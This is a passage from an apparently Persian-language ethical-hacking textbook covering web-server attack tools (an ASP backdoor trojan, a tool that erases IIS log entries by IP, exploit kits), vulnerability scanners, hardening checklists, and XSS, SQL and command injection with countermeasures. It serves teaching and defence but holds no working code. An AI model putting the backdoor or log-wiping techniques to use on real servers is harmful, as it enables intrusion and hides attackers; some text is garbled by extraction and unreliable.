(ASP Trojan (cmd.asp ، اﺳﻜﺮﻳﭙﺖ ﻛﻮﭼﻜﻲ اﺳﺖ ﻛﻪ زﻣﺎﻧﻴﻜﻪ ﺑﺮ روي وب ﺳﺮور آﭘﻠﻮد ﻣﻲ ﺷﻮد، ﻛﻨﺘﺮل ﻛﺎﻣﻞ ﻛﺎﻣﭙﻴﻮﺗﺮ راه دور را ﻣﻲ دﻫﺪ . اﻳﻦ ﻧﺮم اﻓﺰار ﻣﻲ ﺗﻮاﻧﺪ ﺑﻪ راﺣﺘﻲ ﺑﻪ ﺑﺮﻧﺎﻣﻪ اي ﻣﺘﺼﻞ ﺷﻮد و ﺑﻪ ﻋﻨﻮان backdoor اﺳﺘﻔﺎده ﮔﺮدد . .

CleanIISLog ، اﺑﺰاري اﺳﺖ ﻛﻪ log ﻫﺎي IIS را ﺑﺮ ﺣﺴﺐ آدرس IP ﭘﺎك ﻣﻲ ﻛﻨﺪ . ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ رﻛﻮردﻫﺎي ﻓﺎﻳﻞ ﻫﺎي ﻻگ W3SVC را ﻛﻪ ﻣﺮﺑﻮط ﺑﻪ آدرس IP ﺧﻮدش اﺳﺖ را ﭘﺎك ﻛﻨﺪ ﺗﺎ ردﭘﺎﻳﻲ از ﺧﻮد ﺑﺮ ﺟﺎي ﻧﮕﺬارد،

ﺑﺮﺧﻲ دﻳﮕﺮ از اﺑﺰارﻫﺎي ﻫﻚ ﻋﺒﺎرﺗﻨﺪ از : ServerMask ، SAINT Vulnerability Scanner ، CORE IMPACT ، Neosploit ، MPack ، LinkDeny ، HTTPZip ، CasheRight ، ServerMask ip100 . .

146

ﺗﻜﻨﻴﻚ ﻫﺎي ﻣﺪﻳﺮﻳﺖ patch ﻫﺎ ﻫﺎ hotfix ، ﻛﺪي اﺳﺖ ﻛﻪ اﻳﺮادي را در ﻳﻚ ﻣﺤﺼﻮل ﺑﺮﻃﺮف ﻣﻲ ﻛﻨﺪ . ﻣﻤﻜﻦ اﺳﺖ ﻛﺎرﺑﺮان از ﻃﺮﻳﻖ اﻳﻤﻴﻞ ﻳﺎ وب ﺳﺎﻳﺖ ﻓﺮوﺷﻨﺪه از آن ﻣﻄﻠﻊ ﺷﻮﻧﺪ . ﺑﻌﻀﻲ اوﻗﺎت اﻳﻦ hotfix ﻫﺎ ﺗﺮﻛﻴﺐ ﺷﺪه و ﺑﺼﻮرت ﭘﻚ ﺗﻮزﻳﻊ ﻣﻲ ﺷﻮﻧﺪ ﻛﻪ service pack ﻧﺎﻣﻴﺪه ﻣﻲ ﺷﻮد . ﻣﺪﻳﺮﻳﺖ pacth ، ﻓﺮآﻳﻨﺪ ﺑﻪ روز رﺳﺎﻧﻲ patch ﻫﺎي ﻣﻮرد ﻧﻴﺎز ﺑﺮاي ﻳﻚ ﺳﻴﺴﺘﻢ اﺳﺖ . ﻣﺪﻳﺮﻳﺖ ﺻﺤﻴﺢ patch ﻫﺎ ﺷﺎﻣﻞ اﻧﺘﺨﺎب ﻧﺤﻮه ﻧﺼﺐ ، و ﻧﻴﺰ ﺑﺮرﺳﻲ patch ﻫﺎ اﺳﺖ . ﺷﻤﺎ ﺑﺎﻳﺪ ﻻﮔﻲ از patch ﻫﺎي ﻧﺼﺐ ﺷﺪه ﺑﺮ روي ﻫﺮ ﺳﻴﺴﺘﻢ ، را ﻧﮕﻬﺪاري ﻛﻨﻴﺪ . ﺑﺮاي ﻧﺼﺐ ﺳﺎده ﺗﺮ patch ﻫﺎ ، ﻣﻲ ﺗﻮاﻧﻴﺪ از ﺳﻴﺴﺘﻢ ﻫﺎي ﺧﻮدﻛﺎر ﻣﺪﻳﺮﻳﺖ patch ﻛﻪ ﺗﻮﺳﻂ Microsoft ، St. Bernard ، PatchLink و دﻳﮕﺮ ﻓﺮوﺷﻨﺪﮔﺎن ﻧﺮم اﻓﺰار اراﺋﻪ ﺷﺪه اﺳﺖ اﺳﺘﻔﺎده ﻛﻨﻴﺪ ﺗﺎ ﺳﻴﺴﺘﻢ ﻫﺎ را ارزﻳﺎﺑﻲ ﻛﻨﻴﺪ و ﺗﺼﻤﻴﻢ ﺑﮕﻴﺮﻳﺪ ﻛﻪ ﻛﺪام patch ﻫﺎ را ﻧﺼﺐ ﻛﻨﻴﺪ . ﺑﺮﺧﻲ از اﻳﻦ اﺑﺰارﻫﺎ ﻋﺒﺎرﺗﻨﺪ از : UpdateExpert ، HFNetChk ، Qfecheck.

اﺳﻜﻨﺮﻫﺎي آﺳﻴﺐ ﭘﺬﻳﺮي

اﻧﻮاع ﻣﺨﺘﻠﻒ از اﺳﻜﻨﺮﻫﺎي آﺳﻴﺐ ﭘﺬﻳﺮي وﺟﻮد دارﻧﺪ:

اﺳﻜﻨﺮﻫﺎي آﻧﻼﻳﻦ : ﻣﺜﻞ www.securityseers.com

اﺳﻜﻨﺮﻫﺎي اﭘﻦ ﺳﻮرس : ﻣﺜﻞ Nessus Security Scanner ، Snort ، و Nmap . .

اﺳﻜﻨﺮﻫﺎي ﻣﺨﺼﻮص ﻟﻴﻨﻮﻛﺲ : ﻣﺜﻞ XVScan ، SANE ، و Parallel Port . .

Whisker ، ﻧﺮم اﻓﺰار اﺳﻜﻦ آﺳﻴﺐ ﭘﺬﻳﺮي اﺳﺖ ﻛﻪ ﻓﺎﻳﻞ ﻫﺎ و وب ﺳﺮورﻫﺎي راه دور ار از ﻧﻈﺮ داﺷﺘﻦ ﻛا ﺴ ﻳﻮﻠﭙ ﺖ ، اﺳﻜﻦ ﻣﻲ ﺪﻛﻨ . .

147

ﺑﺮﺧﻲ دﻳﮕﺮ از ﻧﺮم اﻓﺰارﻫﺎي اﺳﻜﻦ ﻋﺒﺎرﺗﻨﺪ از : :

• N-Stealth HTTP Vulnerability Scanner • WebInspect • Shadow Security Scanner • SecureIIS • ServersCheck Monitoring • GFI Network Server Monitor • Servers Alive • Webserver Stress Tool • Secunia PSI

روش ﻫﺎي اﻣﻦ ﺳﺎزي وب ﺳﺮور

ﻣﺪﻳﺮ ﻳﻚ وب ﺳﺮور، ﻣﻲ ﺗﻮاﻧﺪ اﻗﺪاﻣﺎت زﻳﺎدي را ﺑﺮاي اﻣﻦ ﺳﺎزي ﺳﺮور اﻧﺠﺎم دﻫﺪ . در زﻳﺮ ﺑﺮﺧﻲ از روش ﻫﺎي اﻣﻦ ﺳﺎزي وب ﺳﺮور آﻣﺪه اﺳﺖ : :

• ﺗﻐﻴﻴﺮ ﻧﺎم اﻛﺎﻧﺖ administrator و اﺳﺘﻔﺎده از ﭘﺴﻮرد ﭘﻴﭽﻴﺪه • ﻏﻴﺮ ﻓﻌﺎل ﻛﺮدن Default web site و default FTP site • ﺣﺬف ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺑﺪون اﺳﺘﻔﺎده از ﺳﺮور از ﻗﺒﻴﻞ WebDAV • ﻏﻴﺮ ﻓﻌﺎل ﻛﺮدن directory browsing ( ﻣﺸﺎﻫﺪه داﻳﺮﻛﺘﻮري ) در ﺗﻨﻈﻴﻤﺎت وب ﺳﺮور • اﺿﺎﻓﻪ ﻛﺮدن ﻳﻚ ﻫﺸﺪار ﻗﺎﻧﻮﻧﻲ در ﺳﺎﻳﺖ ﺑﺮ اي آﮔﺎه ﺳﺎﺧﺘﻦ ﻫﻜﺮﻫﺎ از ﺗﺎﺛﻴﺮات ﻫﻚ ﺳﺎﻳﺖ • ﻧﺼﺐ patch ﻫﺎ و ﺳﺮوﻳﺲ ﭘﻚ ﻫﺎي ﺟﺪﻳﺪ ﺑﺮاي ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ و ﻧﺮم اﻓﺰار وب ﺳﺮور • ﺑﺮرﺳﻲ ورودي ﻫﺎي ﻛﺎرﺑﺮ در ﻓﺮم وب ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از ﺣﻤﻼت buffer overflow ...و • ﻏﻴﺮ ﻓﻌﺎل ﺳﺎﺧﺘﻦ ﻣﺪﻳﺮﻳﺖ از راه دور • اﺳﺘﻔﺎده از اﺳﻜﺮﻳﭙﺘﻲ ﺑﺮاي ﻧﮕﺎﺷﺖ ﻓﺎﻳﻞ ﻫﺎي ﻏﻴﺮ ﻻزم ﺑﻪ ﻳﻚ ﭘﻴﺎم ﺧﻄﺎ از ﻗﺒﻴﻞ File not found ") 404") • ﻓﻌﺎل ﻛﺮدن logging و auditing • اﺳﺘﻔﺎده از ﻓﺎﻳﺮوال ﺑﻴﻦ وب ﺳﺮور و اﻳﻨﺘﺮﻧﺖ و ﺑﺎز ﻛﺮدن ﺗﻨﻬﺎ ﭘﻮرت ﻫﺎي ﻻزم از ﻗﺒﻴﻞ 80 ﻳﺎ 443 • ﺟﺎﻳﮕﺰﻳﻨﻲ روش GET ﺑﺎ روش POST در زﻣﺎن ارﺳﺎل داده ﻫﺎ ﺑﻪ ﻳﻚ وب ﺳﺮور

148

ﻳﻜﻲ از روش ﻫﺎي ﻣﻘﺎﺑﻠﻪ ﺑﺎ cross site scripting ، ﺟﺎﻳﮕﺰﻳﻨﻲ ﻛﺎراﻛﺘﺮﻫﺎي ">" , "<" ﺑﺎ ﻛﺎرﻛﺘﺮﻫﺎي " lt&" و

" gt&" ﺑﺎ اﺳﺘﻔﺎده از اﺳﻜﺮﻳﭙﺖ ﻫﺎي ﺳﺮور اﺳﺖ

ﭼﻚ ﻟﻴﺴﺖ ﻣﺤﺎﻓﻈﺖ از وب ﺳﺮور

Patch ﻫﺎ و update :ﻫﺎ :ﻫﺎ

• از اﺑﺰار MBSA ﺑﺮاي ﺑﺮرﺳﻲ ﻣﻨﻈﻢ آﺧﺮﻳﻦ آﭘﺪﻳﺖ ﻫﺎي ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ اﺳﺘﻔﺎده ﻛﻨﻴﺪ

Auditing و logging : :

• ﻓﻌﺎل ﺳﺎزي failed logon attempts در log • ﺟﺎﺑﺠﺎ ﻛﺮدن و اﻣﻦ ﺳﺎﺧﺘﻦ ﻓﺎﻳﻞ ﻫﺎي log ﺑﺮاي IIS

ﺳﺮوﻳﺲ :ﻫﺎ :ﻫﺎ

• ﻏﻴﺮﻓﻌﺎل ﺳﺎﺧﺘﻦ ﺳﺮوﻳﺲ ﻫﺎي ﻏﻴﺮ ﺿﺮوري وﻳﻨﺪوز • اﺟﺮاي ﺳﺮوﻳﺲ ﻫﺎي ﺿﺮوري ﺑﺎ ﻛﻤﺘﺮﻳﻦ ﺳﻄﺢ دﺳﺘﺮﺳﻲ

: : Script Mapping

• Extension ﻫﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﺑﺮﻧﺎﻣﻪ ﻫﺎ اﺳﺘﻔﺎده ﻧﻤﻲ ﺷﻮﻧﺪ ﺑﻪ dll.404 ﻫﺪاﻳﺖ ﺷﻮﻧﺪ ( shtml ، .ida ، .htw ، .idq. ، printer ، .htr ، .idc ، .stm.)

ﭘﺮوﺗﻜﻞ :ﻫﺎ :ﻫﺎ

• ﻏﻴﺮ ﻓﻌﺎل ﻛﺮدن WebDAV • ﻏﻴﺮ ﻓﻌﺎل ﻛﺮدن NetBIOS و SMB ( ﺑﺴﺘﻦ ﭘﻮرت ﻫﺎي 137 ، 138 ، 139 و 445)

اﻛﺎﻧﺖ :ﻫﺎ :ﻫﺎ

• ﺣﺬف اﻛﺎﻧﺖ ﻫﺎي ﺑﺪون اﺳﺘﻔﺎده • ﻏﻴﺮ ﻓﻌﺎل ﻛﺮدن اﻛﺎﻧﺖ quest • ﺗﻐﻴﺮ ﻧﺎم اﻛﺎﻧﺖ administrator • ﻓﻌﺎل ﻛﺮدن ورود ﻣﺤﻠﻲ ﺑﺮاي Administartor

149

: : ISAPI Filters

• ﺣﺬف ﻓﻴﻠﺘﺮﻫﺎي ISAPI ﻛﻪ اﺳﺘﻔﺎده ﻧﻤﻲ ﺷﻮد

ﻓﺎﻳﻞ ﻫﺎ و داﻳﺮﻛﺘﻮري :ﻫﺎ :ﻫﺎ

• ﻓﺎﻳﻞ ﻫﺎ و داﻳﺮﻛﺘﻮري ﻫﺎ ﺑﺎﻳﺪ در دراﻳﻮﻫﺎي NTFS ﺑﺎﺷﻨﺪ • ﻣﺤﺘﻮاي وب ﺳﺎﻳﺖ در دراﻳﻮي ﺑﻪ ﻏﻴﺮ از NTFS ذﺧﻴﺮه ﺷﻮﻧﺪ • داﻳﺮﻛﺘﻮري رﻳﺸﻪ وب ﺳﺎﻳﺖ، ﺣﻖ ﻧﻮﺷﺘﻦ را ﺑﺮاي IUSER COMPUTERNAME را deny ﻛﻨﺪ

: : IIS Metabase

• ﺑﺎ اﺳﺘﻔﺎده از ﻣﺠﻮزﻫﺎي NTFS ، دﺳﺘﺮﺳﻲ ﺑﻪ metabase ﺑﺎﻳﺪ ﻣﺤﺪود ﺷﻮد

Share ﻫﺎ : : ﻫﺎ

• ﺣﺬف share ﻫﺎي C$ ) administrator و $Admin)

ﭘﻮرت :ﻫﺎ :ﻫﺎ

• ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب، ﺗﻨﻬﺎ ﺑﺮاي اﺳﺘﻔﺎده از ﭘﻮرت 80 و 443 ﻣﺤﺪود ﺷﻮﻧﺪ

اﻣﻨﻴﺖ دﺳﺘﺮﺳﻲ ﺑﻪ ﻛﺪ : :

• اﻣﻨﻴﺖ دﺳ ﺘﺮﺳﻲ ﺑﻪ ﻛﺪ، ﺑﺮ روي ﺳﺮور ﻓﻌﺎل ﺷ دﻮ دﻮ

آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب

ﺑﻪ ﻋﻨﻮان ﻛﺎرﺷﻨﺎس اﻣﻨﻴﺘﻲ، ﻋﻼوه ﺑﺮ اﻳﻨﻜﻪ ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺎ آﺳﻴﺐ ﭘﺬﻳﺮي وب ﺳﺮورﻫﺎ آﺷﻨﺎ ﺑﺎﺷﻴﺪ ﺑﺎﻳﺴﺘﻲ ﺑﺎ آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب ﻫﻢ آﺷﻨﺎ ﺑﺎﺷﻴﺪ . در اﻳﻦ ﺑﺨﺶ، در ﻣﻮرد ﻧﺤﻮه ﻛﺎر ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب و ﻫﺪف از ﻫﻚ وب ﺳﺮور ﺎﻫ ﺑﺤﺚ ﺧﻮاﻫﻴﻢ ﻛﺮد . ﻫﻤﭽﻨﻴﻦ ﺳﺎﺧﺘﺎر ﺣﻤﻼت ﺑﺮ ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب و ﺑﻌﻀﻲ از ﺗﻬﺪﻳﺪات ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب را ﻣﻮرد آزﻣﺎﻳﺶ ﻗﺮار ﺧﻮاﻫﻴﻢ داد . در آﺧﺮ، در ﻣﻮرد google hacking و روش ﻫﺎي ﻣﻘﺎﺑﻠﻪ ﺑﺎ آن ﺑﺤﺚ ﺧﻮاﻫﻴﻢ ﻛﺮد . .

150

ﻧﺤﻮه ﻛﺎر ﺑﺮﻧﺎﻣﻪ ﻫﺎي وب

ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب، ﺑﺮﻧﺎﻣﻪ ﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺮ روي وب ﺳﺮور ﻧﮕﻬﺪاري ﻣﻲ ﺷﻮﻧﺪ ﺗﺎ ﻛﺎرﺑﺮ ﺑﺘﻮاﻧﺪ از ﻃﺮﻳﻖ وب ﺳﺎﻳﺖ، ﻛﺎر ﻛﻨﺪ . ﻛﻮﺋﺮي ﻫﺎي ﭘﺎﻳﮕﺎه داده، وب ﻣﻴﻞ، ﮔﺮوه ﻫﺎي ﺑﺤﺚ، و ﺑﻼگ ﻫﺎ، ﻣﺜﺎل ﻫﺎﻳﻲ از ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب ﻫﺴﺘﻨﺪ . .

ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺗﺤﺖ وب، از ﻣﻌﻤﺎري ﻛﻼﻳﻨﺖ/ ﺳﺮور اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ ﻛﻪ ﻣﺮورﮔﺮ وب ﺑﻪ ﻋﻨﻮان ﻛﻼﻳﻨﺖ و وب ﺳﺮور ﺑﻪ ﻋﻨﻮان اﭘﻠﻴﻜﺸﻦ ﺳﺮور ﻋﻤﻞ ﻣﻲ ﻛﻨﺪ . ﺟﺎوا اﺳﻜﺮﻳﭙﺖ، روﺷﻲ راﻳﺞ ﺑﺮاي ﭘﻴﺎده ﺳﺎزي ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب اﺳﺖ . از آﻧﺠﺎﺋﻴﻜﻪ ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب، ﺑﻪ ﻃﻮر ﮔﺴﺘﺮده ﭘﻴﺎده ﺳﺎزي ﺷﺪه اﻧﺪ، ﻫﺮ ﻛﺎرﺑﺮي ﺑﺎ ﻣﺮورﮔﺮ ﺧﻮد ﻣﻲ ﺗﻮاﻧﺪ ﺑﺎ اﻏﻠﺐ ﻳﻮﺗﻴﻠﻴﺘﻲ ﺳﺎﻳﺖ ﻫﺎ ﺗﻌﺎﻣﻞ ﻛﻨﺪ . .

ﻫﺪ ف از ﻫﻚ ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب

ﻫﺪف از ﻫﻚ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺗﺤﺖ وب، ﺑﻪ دﺳﺖ آوردن اﻃﻼﻋﺎت ﻣﺤﺮﻣﺎﻧﻪ اﺳﺖ . ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب، ﺑﺮاي اﻣﻨﻴﺖ ﻳﻚ ﺳﻴﺴﺘﻢ، ﺣﻴﺎﺗﻲ ﻫﺴﺘﻨﺪ ﺑﺮاي اﻳﻨﻜﻪ آﻧﻬﺎ ﻣﻌﻤﻮﻻ ﺑﻪ ﭘﺎﻳﮕﺎه داده اي ﻛﻪ ﺷﺎﻣﻞ اﻃﻼﻋﺎﺗﻲ از ﻗﺒﻴﻞ ﻫﻮﻳﺖ ﻫﺎ ﺑﺎ ﺷﻤﺎره ﻫﺎ و ﭘﺴﻮردﻫﺎي ﻛﺎرت اﻋﺘﺒﺎري اﺳﺖ، ﻣﺘﺼﻞ ﻣﻲ ﺷﻮﻧﺪ . آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎ ي ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب، ﺗﻬﺪﻳﺪات را اﻓﺰاﻳﺶ ﻣﻲ دﻫﺪ و ﺳﺒﺐ ﻣﻲ ﺷﻮد ﻫﻜﺮﻫﺎ ﺑﺘﻮاﻧﻨﺪ از ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ و ﻳﺎ ﻧﺮم اﻓﺰار وب ﺳﺮور ﻳﺎ ﺑﺮﻧﺎﻣﻪ ﺗﺤﺖ وب ﺳﻮ اﺳﺘﻔﺎده ﻛﻨﻨﺪ . ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب، راه ورود دﻳﮕﺮي ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺴ ﺘﻨﺪ و ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﺮاي ﻧﻔﻮذ ﺑﻪ ﺳﻴﺴﺘﻢ اﺳﺘﻔﺎده ﺷﻮﻧﺪ . .

آﻧﺎﺗﻮﻣﻲ ﺣﻤﻠﻪ

ﻫﻚ ﻛﺮدن ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب، ﻣﺸﺎﺑﻪ ﻫﻚ ﻛﺮدن ﺳﻴﺴﺘﻢ ﻫﺎي دﻳﮕﺮ اﺳﺖ . ﻫﻜﺮﻫﺎ، ﻳﻚ ﻓﺮآﻳﻨﺪ ﭘﻨﺞ ﻣﺮﺣﻠﻪ اي را دﻧﺒﺎل ﻣﻲ ﻛﻨﻨﺪ : آﻧﻬﺎ ﺷﺒﻜﻪ را اﺳﻜﻦ ﻣﻲ ﻛﻨﻨﺪ، اﻃﻼﻋﺎت را ﺑﺮاي ﺗﺴﺖ ﺣﻤﻼت ﻣﺨﺘﻠﻒ ﺟﻤﻊ آوري ﻣﻲ ﻛﻨﻨﺪ، و ﻧﻬﺎﻳﺘﺎ ﺣﻤﻠﻪ را ﻃﺮح رﻳﺰي و اﺟﺮا ﻣﻲ ﻛﻨﻨﺪ . اﻳﻦ ﻣﺮاﺣﻞ در ﺷﻜﻞ زﻳﺮ ﻧﺸﺎن داده ﺷﺪه اﺳﺖ : :

151

ﺗﻬﺪﻳﺪات ﺑﺮﻧﺎﻣﻪ ﻫﺎي وب

ﺗﻬﺪﻳﺪات زﻳﺎدي در وب ﺳﺮور وﺟﻮد دارﻧﺪ . در زﻳﺮ، ﻣﻬﻢ ﺗﺮﻳﻦ اﻳﻦ ﺗﻬﺪﻳﺪات ذﻛﺮ ﺷﺪه :اﻧﺪ :اﻧﺪ

Cross-site scripting: زﻣﺎﻧﻴﻜﻪ ﻫﻜﺮ از ﺑﺮﻧﺎﻣﻪ ﺗﺤﺖ وب اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ ﺗﺎ ﻛﺪ ﻣﺨﺮب ﻣﺜﻞ ﺟﺎوا اﺳﻜﺮﻳﭙﺖ را ارﺳﺎل ﻛﻨﺪ، cross-site scripting اﺗﻔﺎق ﻣﻲ اﻓﺘﺪ . در اﻳﻦ ﺣﻤﻠﻪ، ﻓﺎﻳﻞ ﻫﺎي ﻛﺎرﺑﺮ ﻧﻬﺎﻳﻲ ﻓﺎش ﻣﻲ ﺷﻮﻧﺪ، ﺗﺮوﺟﺎن ﻧﺼﺐ ﻣﻲ ﺷﻮد، ﻛﺎرﺑﺮ ﺑﻪ ﺻﻔﺤﻪ دﻳﮕﺮي ﻫﺪاﻳﺖ ﻣﻲ ﺷﻮد، و ﻣﺤﺘﻮا ﺗﻐﻴﻴ ﺮ ﻣﻲ ﻛﻨﺪ . وب ﺳﺮورﻫﺎ، اﭘﻠﻴﻜﺸﻦ ﺳﺮورﻫﺎ، و وب اﭘﻠﻴﻜﺸﻦ ﻫﺎ، ﻣﺴﺘﻌﺪ ﻦﻳا عﻮﻧ ﺣ ﻪﻠﻤ ﻫﺴ ﺪﻨﺘ . . ﺪﻨﺘ

ﻣﺜﺎﻟﻲ از XSS: ﻫﻜﺮي ﻣﺘﻮﺟﻪ ﻣﻲ ﺷﻮد ﻛﻪ وب ﺳﺎﻳﺖ XSECURITY ، داراي اﻳﻦ ﺑﺎگ ( ﻣﺸﻜﻞ ) اﺳﺖ . ﻫﻜﺮ اﻳﻤﻴﻠﻲ ﺑﻪ ﺷﻤﺎ ارﺳﺎل ﻣﻲ ﻛﻨﺪ و ادﻋﺎ ﻣﻲ ﻛﻨﺪ ﻛﻪ ﺷﻤﺎ ﺑﺮﻧﺪه ﺷﺪﻳﺪ و ﺗﻨﻬﺎ ﻛﺎري ﻛﻪ ﺑﺎﻳﺪ ﺑﻜﻨﻴﺪ اﻳﻦ اﺳﺖ ﻛﻪ ﺑﺮ روي ﻟﻴﻨﻚ زﻳﺮ ﻛﻠﻴﻚ ﻛﻨﻴﺪ . آدرس ﻟﻴﻨﻚ ﺑﻪ ﺻﻮرت evilScript()evilScript() اﺳﺖ . وب ﺳﺮور، ﻧﺎم ﺷﻤﺎ را داﺧﻞ HTML ﺟﺎﺳﺎزي ﻣﻲ ﻛﻨﺪ و ﺑﻪ ﻣﺮورﮔﺮ ﺷﻤﺎ ارﺳﺎل ﻣﻲ ﻛﻨﺪ . ﻣﺮورﮔﺮ ﺷﻤﺎ، اﻳﻦ اﺳﻜﺮﻳﭙﺖ را ﺑﻪ درﺳﺘﻲ ﺗﻔﺴﻴﺮ ﻣﻲ ﻛﻨﺪ . اﮔﺮ اﻳﻦ اﺳﻜﺮﻳﭙﺖ ﺑﻪ ﻣﺮورﮔﺮ ﺷﻤﺎ دﺳﺘﻮر دﻫﺪ ﻛﻪ ﻛﻮﻛﻲ ، اﻃﻼﻋﺎت ﺳﺮﻣﺎﻳﻪ و ﺳﻬﺎم ﺷﻤﺎ را ﺑﻪ ﻫﻜﺮ ﺑﻔﺮﺳﺘﺪ، ﺳﺮﻳﻌﺎ آن را اﻧﺠﺎم ﻣﻲ دﻫﺪ . ﭘﺲ از ﻫﻤﻪ اﻳﻨﻬﺎ، دﺳﺘﻮري از وب ﺳﺎﻳﺖ XSECURITY ﻣﻲ آﻳﺪ ﻛﻪ ﻣﺎﻟﻚ آن ﻛﻮﻛﻲ اﺳﺖ . .

152

ﺑﺮاي ﻣﻘﺎﺑﻠﻪ ﺑﺎ آن، ﻫﺪرﻫﺎ، ﻛﻮﻛﻲ ﻫﺎ، ﻓﻴﻠﺪﻫﺎي ﻓﺮم ﻫﺎ، و ﻓﻴﻠﺪﻫﺎي ﺧﺎﻟﻲ را ﺑﺮرﺳﻲ ( validate ) ﻛﻨﻴﺪ، از ﺳﻴﺎﺳﺖ اﻣﻨﻴﺘﻲ ﺷﺪﻳﺪ ﭘﻴﺮوي ﻛﻨﻴﺪ، ﺧﺮوﺟﻲ ﻫﺎي اﺳﻜﺮﻳﭙﺖ را ﻓﻴﻠﺘﺮ ﻛﻨﻴﺪ ﺗﺎ از ارﺳﺎل آﻧﻬﺎ ﺗﻮﺳﻂ ﻛﺎرﺑﺮان ﺟﻠﻮﮔﻴﺮي ﻛﻨﻴﺪ و آﺳﻴﺐ ﭘﺬﻳﺮي XSS را از ﺑﻴﻦ ﺑﺒﺮﻳﺪ . .

SQL injection: از SQL ﺑﺮاي دﺳﺘﻜﺎري ﻣﺴﺘﻘﻴﻢ داده ﻫﺎي ﭘﺎﻳﮕﺎه داده اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . ﺑﺎ ﺗﺰرﻳﻖ دﺳﺘﻮرات SQL ﺑﻪ URL ، ﺳﺒﺐ از ﻛﺎر اﻧﺪاﺧﺘﻦ، ﺗﻐﻴﻴﺮ، ﺣﺬف، ﻳﺎ اﻳﺠﺎد اﻃﻼﻋﺎت در ﺳﺮور ﭘﺎﻳﮕﺎه داده ﻣﻲ ﺷﻮد . ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ از ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب آﺳﻴﺐ ﭘﺬﻳﺮ اﺳﺘﻔﺎده ﻛﻨﺪ ﺗﺎ ﻣﻌﻴﺎرﻫﺎي اﻣﻨﻴﺘﻲ را دور ﺑﺰﻧﺪ و ﺑﺘﻮاﻧﺪ ﺑﻪ داده ﻫﺎي ﺑﺎ ارزش دﺳﺘﺮﺳﻲ ﭘﻴﺪا ﻛﻨﺪ . ﻣﻌﻤﻮﻻ ﺣﻤﻼت SQL Injection ، از ﻃﺮﻳﻖ ﻧﻮار آدرس، ﻓﻴﻠﺪﻫﺎي ﺑﺮﻧﺎﻣﻪ ﻫﺎ، و از ﻃﺮﻳﻖ ﻛﻮﺋﺮي و ﺟﺴﺘﺠﻮ اﻧﺠﺎم ﻣﻲ .ﺪﻧﮔﻴﺮ .ﺪﻧﮔﻴﺮ ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از ا ﻳﻦ ﺣﻤﻠﻪ، ﻣﺘﻐﻴﺮﻫﺎي ﻛﺎرﺑﺮ را ﭼﻚ ﻛﻨﻴﺪ . .

Command injection: ﻫﻜﺮ، دﺳﺘﻮرات ﺑﺮﻧﺎﻣﻪ را وارد وب ﻓﺮم ﻣﻲ ﻛﻨﺪ . اﻳﻦ ﻧﻘﺺ، ﺑﺮ ﻣﺒﻨﺎي اﻧﺘﻘﺎل ﻛﺪ ﻣﺨﺮب از ﻃﺮﻳﻖ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺗﺤﺖ وب ﺑﻪ ﺳﻴﺴﺘﻢ دﻳﮕﺮ اﺳﺖ . اﺳﻜﺮﻳﭙﺖ ﻫﺎﻳﻲ ﻛﻪ ﺑﺎ زﺑﺎن ﻫﺎي python ، Perl و ... ﻧﻮﺷﺘﻪ ﻣﻲ ﺷﻮد ﻣﻲ ﺗﻮاﻧﻨﺪ وارد ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وﺑﻲ ﻛﻪ ﺿﻌﻴﻒ ﻃﺮاﺣﻲ ﺷﺪه اﻧﺪ، ﺷﻮﻧﺪ . ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از اﻳﻦ ﺣﻤﻠﻪ، از ﻛﺘﺎﺑﺨﺎﻧﻪ ﻫﺎي ﻣﺨﺘﺺ زﺑﺎن ( langiage-specific libraries ) ﺑﺮاي زﺑﺎن ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺴﻲ اﺳﺘﻔﺎده ﻛﻨﻴﺪ . .

